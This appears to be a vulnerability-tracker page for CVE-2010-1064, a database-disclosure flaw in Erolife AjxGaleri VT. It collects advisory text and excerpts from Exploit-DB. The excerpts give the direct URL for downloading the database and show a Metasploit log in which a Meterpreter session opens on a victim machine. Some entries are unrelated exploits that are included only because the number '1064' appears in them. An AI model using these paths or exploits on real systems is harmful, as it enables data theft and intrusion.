CVE-2010-1064
Published 2010-03-23
CVE-2010-1064: Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via…
Priority: P3 · 37 · medium · 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 2.46% (82.4th percentile)
Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/ajxgaleri.mdb.
VulDB
Aspindir Erolife AjxGaleri VT db/ajxgaleri.mdb access control (EDB-11023 / XFDB-55446)
vuldb·2026-05-03·CVSS 5.0
CVE-2010-1064 [MEDIUM] Aspindir Erolife AjxGaleri VT db/ajxgaleri.mdb access control (EDB-11023 / XFDB-55446)
A vulnerability, which was classified as problematic, was found in Aspindir Erolife AjxGaleri VT. Affected by this issue is some unknown functionality of the file db/ajxgaleri.mdb. Executing a manipulation can lead to improper access controls.
This vulnerability is handled as CVE-2010-1064. The attack can be executed remotely. Additionally, an exploit exists.
GHSA
GHSA-g2xm-x2v9-45p6: Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a dat
ghsa_unreviewed·2022-05-02
CVE-2010-1064 [MEDIUM] GHSA-g2xm-x2v9-45p6: Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a dat
Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/ajxgaleri.mdb.
No detection rules found.
Exploit-DB
Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
exploitdb·2010-12-02
CVE-2010-5194 Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
---
# Image Viewer CP gold v5.5 Buffer Overflow
# Found by: bz1p (AT) bshellz.net
# Impact: Low, NOT marked safe for scripting or initializing
# CVE: ? (0day)
#
# msf exploit(image_viewer_cpgold) >
# [*] Sending exploit to 172.17.120.211:1061...
# [*] Sending stage (749056 bytes) to 172.17.120.211
# [*] Meterpreter session 1 opened (172.17.120.235:4443 -> 172.17.120.211:1064) at 2010-11-15 18:11:32 +1100
#
# msf exploit(image_viewer_cpgold) > sessions -l
#
# Active sessions
# ===============
#
# Id Type Information Connection
# -- ---- ----------- ----------
# 1 meterpreter x86/win32 VICTIMXP\victim @ VICTIM 172.17.120.235:4443 -> 172.17.120.211:1064
#
# msf exploit(image_viewer_cpgold) > sessions -i 1
#
Exploit-DB
xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection
exploitdb·2010-09-18
CVE-2010-4954 xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection
xt:Commerce Gambio 2008 xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064
##############################################################################################
[THANKS TO]
ALLAH - الله لا إله لا ايل
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION
Exploit-DB
Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
exploitdb·2010-05-19·CVSS 10.0
CVE-2010-1663 [CRITICAL] Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
---
# Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
# Author: Jordi Chancel
#
# Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
# Description: {
# The Google URL Parsing Library (aka google-url or GURL) in Google Chrome
# before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy
# via CHARACTER TABULATION or others escape characters inside javascript: protocol string. }
#
# Some PoC :
Inject JavaScript
Greetz : Xylitol , Eddy Bordi , 599eme Man , Gno
Exploit-DB
Erolife AjxGaleri VT - Database Disclosure
exploitdb·2010-01-06
CVE-2010-1064 Erolife AjxGaleri VT - Database Disclosure
Erolife AjxGaleri VT - Database Disclosure
---
[»] ~ Note : Happy New Year, everyone
[»] Erolife AjxGaleri VT Database Disclosure Vulnerability
[»] Script: [ Erolife AjxGaleri VT ]
[»] Language: [ ASP ]
[»] Download: [ http://www.aspindir.com/goster/4322 ]
[»] Founder: [ LionTurk - [email protected] - LionTurk.Turkblog.com ]
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
[»]N0T3 : Stay tuned for my new vulnerabilities.
###########################################################################
===[ Exploit And Dork ]===
[»] http://localhost/path/db/ajxgaleri.mdb
No writeups or analysis indexed.
http://packetstormsecurity.org/1001-exploits/erolife-disclose.txt
http://secunia.com/advisories/38033
http://www.exploit-db.com/exploits/11023
https://exchange.xforce.ibmcloud.com/vulnerabilities/55446
Published: 2010-03-23